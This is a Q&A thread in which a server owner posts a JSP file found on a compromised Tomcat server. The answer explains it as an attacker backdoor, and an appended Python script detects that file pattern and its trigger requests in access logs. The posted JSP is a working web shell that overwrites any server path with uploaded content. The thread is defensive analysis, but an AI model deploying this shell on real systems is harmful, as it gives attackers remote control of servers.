What is this code doing?
Question
I have a web application which has been recently exploited. The server is Tomcat 7.0.42. I have found files on the server which I haven't uploaded. Do you know why they are appearing? Here I show you the contents of one of these files; can anybody tell me what it is trying to do?
<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<%
int i=0;
String method=request.getParameter("act");
if(method!=null && method.equals("yoco")) {
    String url=request.getParameter("url");
    String text=request.getParameter("smart");
    File f=new File(url);
    if(f.exists()) {
        f.delete();
    }
    try{
        OutputStream o=new FileOutputStream(f);
        o.write(text.getBytes());
        o.close();
    } catch (Exception e) {
        i++;
        %>0<%
    }
}
if(i==0){
    %>1<%
}
%>
<form action='?act=yoco' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url">
<br>
<textarea rows="20" cols="80" name="smart">
Recommended answer
This looks like a rootkit providing remote control for attackers. They are making a form post to the same JSP servlet. When the POST request is received, the parameter values sent to it via the POST request are held and processed:
String url=request.getParameter("url");
String text=request.getParameter("smart");
Notice the value received via parameter url is held in a variable url. They then check to make sure the parameter value does exist as a file before deleting it, using:
File f=new File(url);
if(f.exists()) {
f.delete();
}
Finally, the second parameter smart is held in parameter text. This is then used as the content of a new file created using parameter url as the file path:
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
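As an added triage helper (not part of the question or the answer above), the following Python script checks a JSP source for the three steps the answer walks through (a request parameter becoming a File path, a second parameter becoming file content through FileOutputStream) and scans Tomcat access-log lines for POSTs carrying the act=yoco trigger in the request line. The log lines are constructed, and the log regex assumes Tomcat's AccessLogValve "common" pattern.

```python
import re

# Map "String var=request.getParameter("name")" to var -> name, then see whether
# such a variable reaches new File(...) (path) or .write(var.getBytes()) (content).
PARAM_ASSIGN = re.compile(r'String\s+(\w+)\s*=\s*request\.getParameter\("(\w+)"\)')
NEW_FILE = re.compile(r'new\s+File\s*\(\s*(\w+)\s*\)')
WRITE_BYTES = re.compile(r'\.write\s*\(\s*(\w+)\.getBytes\(\)\s*\)')
FILE_OUT = re.compile(r'new\s+FileOutputStream\s*\(')

def analyse_jsp(source):
    """Return which request parameters control the file path and the file content."""
    tainted = dict(PARAM_ASSIGN.findall(source))  # java variable -> request parameter
    path_params = [tainted[v] for v in NEW_FILE.findall(source) if v in tainted]
    content_params = [tainted[v] for v in WRITE_BYTES.findall(source) if v in tainted]
    return {
        "path_params": path_params,
        "content_params": content_params,
        # all three together is the parameter-driven file dropper shape of the posted page
        "file_dropper": bool(path_params and content_params and FILE_OUT.search(source)),
    }

# Assumed Tomcat "common" access log: host ident user [date] "request" status bytes
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_requests(log_lines, trigger="act=yoco"):
    """Return (ip, uri) for POST requests whose request line carries the trigger parameter."""
    hits = []
    for line in log_lines:
        m = ACCESS_LINE.match(line)
        if m and m["method"] == "POST" and trigger in m["uri"]:
            hits.append((m["ip"], m["uri"]))
    return hits

# Constructed sample inputs: the key lines from the posted JSP and two made-up log entries.
SAMPLE_JSP = '''String url=request.getParameter("url");
String text=request.getParameter("smart");
File f=new File(url);
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());'''
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2013:13:55:36 +0000] "POST /app/x.jsp?act=yoco HTTP/1.1" 200 1',
    '192.0.2.5 - - [10/Oct/2013:13:55:40 +0000] "GET /app/index.jsp HTTP/1.1" 200 4312',
]

if __name__ == "__main__":
    print(analyse_jsp(SAMPLE_JSP))
    print(suspicious_requests(SAMPLE_LOG))
```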